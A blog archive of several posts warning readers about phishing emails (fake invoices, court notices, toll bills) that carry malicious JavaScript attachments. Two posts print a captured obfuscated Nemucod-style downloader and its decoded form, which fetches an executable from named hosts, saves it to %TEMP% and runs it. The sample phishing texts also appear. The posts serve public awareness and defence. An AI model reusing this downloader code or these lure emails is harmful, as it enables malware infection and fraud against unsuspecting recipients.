Tag Archives: Javascript

A dozen Crypto attempts today

Posted on by The Old Wolf

crypto

All of these arrived in my inbox today; many are duplicated versions of the same message with minor changes.

Dear info,
Cathleen Holcomb asked me to send you the attached Word document, which contains the final version of the report.
Please let me know if you have any trouble with the file, and please let Cathleen know if you have any questions about the contents of the report.
Kind regards
Alisa Harper
Managing Director
Notice that all of these emails begin with “Dear Info,” since the relevant address is “info@devnull.com.” This in itself should be a red flag.
Dear info:
Thank you for your email regarding your order of 21 June, and sorry for the delay in replying. I am writing to confirm receipt of your order, and to inform you that the item you requested will be delivered by 25 June at the latest. If you require more information regarding this order, please do not hesitate to contact me.
Also, our records show that we have not yet received payment for the previous order of 11 June, so I would be grateful if you could send payment as soon as possible. Please find attached the corresponding invoice.
If there is anything else you require, our company would be pleased to help. Looking forward to hearing from you soon.
Yours sincerely
Benjamin Martin
Chief Executive Officer
Information. A report. An invoice with request for payment. A spreadsheet. All looking innocuous and legitimate.
Dear info,
The reference you requested is attached.
Let me know if you have any questions.
Best regards
Erma Frederick
CEO
No matter how official emails like this look, you should verify every detail before proceeding.
Dear info,
Our records show that we have not yet received payment for the previous order #A-393685
Could you please send payment as soon as possible?
Please find attached file for details.
Yours sincerely
Jami Garrett
Mexico Key Account Director
Don’t open those attachments! They are almost certainly javascript files which will download an encryption virus or something equally vicious.
Be careful out there.
The Old Wolf has spoken.

Malware Payloads

Posted on by The Old Wolf

Chapa NO MALWARE

I’ve noticed a lot of malicious emails coming through to one of my addresses lately – interestingly enough not at Gmail, which may even filter these things out before they are even sent to Spam – but to one of my private email addresses. Here are two examples:

Dear info,

Many thanks for your card payment. Please find payment confirmation attached below. Should you have any queries, please do not hesitate to contact Credit Control Team.

Best regards

Dena Carpenter
Director Audit Services
Attachment: 851E2_info_43A8AE.rar
And this one:
Dear info,
Please check the bill in attachment.
In order to avoid fine you have to pay in 48 hours.
Best regards
Antonia Snider
Executive Director Sales Account Management Training Performance Support
Attachment: info_e-bill_669770.zip
Both of these emails came with compressed attachments, one a .zip file and one a .rar file. Inside each was a document with the extension “.js,” meaning it’s a javascript file which would automatically run once the file was clicked on to see the “invoice”or “bill.”

DO NOT DO THIS.

From Microsoft’s Malware Protection Center:

Payload: Downloads malware or unwanted software

This threat can download other malware and unwanted software onto your PC. We have seen it download the following threats:

  • PWS:Win32/Fareit
  • Ransom:Win32/Crowti.A

Connects to a remote host

We have seen this threat connect to a remote host, including:
  • davis1.ru using port 80
Malware can connect to a remote host to do any of the following:

  • Check for an Internet connection
  • Download and run files (including updates or other malware)
  • Report a new infection to its author
  • Receive configuration or other data
  • Receive instructions from a malicious hacker
  • Search for your PC location
  • Upload information taken from your PC
  • Validate a digital certificate

We have seen this threat access online content, including:

  • two.jpg
  • one.jpg

Another similar threat is 097M/Donoff. This Microsoft Article shows many types of emails that are being sent out to try to get people to run this malware. One of my emails contained Win32/Penzievs, which is so new that Microsoft has no technical details on it yet.

Working at Carbonite™, we have seen many customers who have been infected by the Cryptolocker virus and similar encryption programs. Almost all of these vicious payloads come as email attachments that are opened by the unwary. While having good anti-virus protection and a rcloud-based backup system that protects multiple versions of your files is good insurance, the best procedure is never to open attachments from unknown sources, no matter how legitimate they look. Especially always avoid “.exe,” “.com,” “.zip,” and “.rar” files.

Be careful out there. Protect yourself and your loved ones.

The Old Wolf has spoken.

 

Order to Appear in Court

Posted on by The Old Wolf

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>
Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.

Posted on by The Old Wolf

noattachments

I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <nathaniel.berger@realestate-philippines.net>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.
Attached: 00000554562.zip
Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <calvin.gleason@adescbrasil.com.br>
Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Sincerely,
Calvin Gleason,
E-ZPass Agent.
E-ZPass_0000133433.zip

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘nt.ph’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com avolonage.com”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.